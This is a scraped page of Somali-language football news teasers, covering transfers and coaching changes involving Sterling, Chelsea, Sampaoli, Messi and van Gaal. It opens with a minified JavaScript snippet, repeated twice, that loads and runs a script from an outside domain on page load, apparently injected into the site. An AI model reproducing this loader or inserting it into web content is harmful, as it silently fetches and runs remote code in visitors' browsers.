;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Raheem Sterling ayaa wali sii wada dagaalkii uu kula jiray kooxdiisii hore ee Liverpool isagoo tilmaamay in kooxda uu haatan ka tirsan yahay ee Manchester City...
Halyeeyga kooxda Chelsea ee Franka Lampard ayaa qaba in kooxdiisi hore ee Blues ay u baahan tahay ugu yaraan afar saxiix si ay ugu soo laabtaan...
Tababarihii xulka qaranka Chile ee Jorge Sampaoli ayaa iska casilay shaqada tababaranimo ee xulka qaranka Chile kadib markii ay isku dhaceen madax waynaha dhawaanta loo doortay...
Kooxda Chelsea ayaa heshiis la gaadhay xidiga ree Brazil ee Alexandre Pato sida ay ku warantay jariirada Mirror, waxayna wararku sheegayaan in wakiilka Pato ay London...
ababarihii Hore Ee Real Madrid Ee Jorge Valdano Oo Neymar Jr Ku Taageeray Abaal Marinta Ballon d’Or-ka Isaga Oo Sheegay In Sanadkii Ugu Horeeyay Ee Barcelona...
Xidiga xulka qaranka Brazil iyo kooxda AC Milan ee Luiz Adriano ayaa ku soo hungoobay safar uu todobaadkan ku tagay dalka Shiinaha halkaas oo uu doonayay...
Sida ay sheegayaan wararka ka imaanaya talyaaniga wakiilka weerar yahanka kooxda PSG ee Ezequiel Lavezzi ayaa kulan la qaadan doona maanta masuuliyiin ka socota kooxda Chelsea....
Weerar yahanka kooxda PSG Zlatan Ibrahimovic ayaa la taliyay weerar yahanka kula lamaansan booska weerarka ee Edinson Cavani. Cavani ayaan ku qanacsanayn inuu la sii joogo...
Lionel Messi iyo Luis Suarez ayaan labadaba ku soo bixin liiska 18 ka xidig ee macalinka Luis Enrique uu u ku xeystay kulanka ay kooxdiisa Barcelona...
Louis van Gaal ayaa doonaya inuu isaga dhaqaaqo Manchester United xagaagan sannad ka hor inta uusan dhamaanin qandaraaskiisa, sida ay qortay jariirada Ingariiska ee Daily Mirror....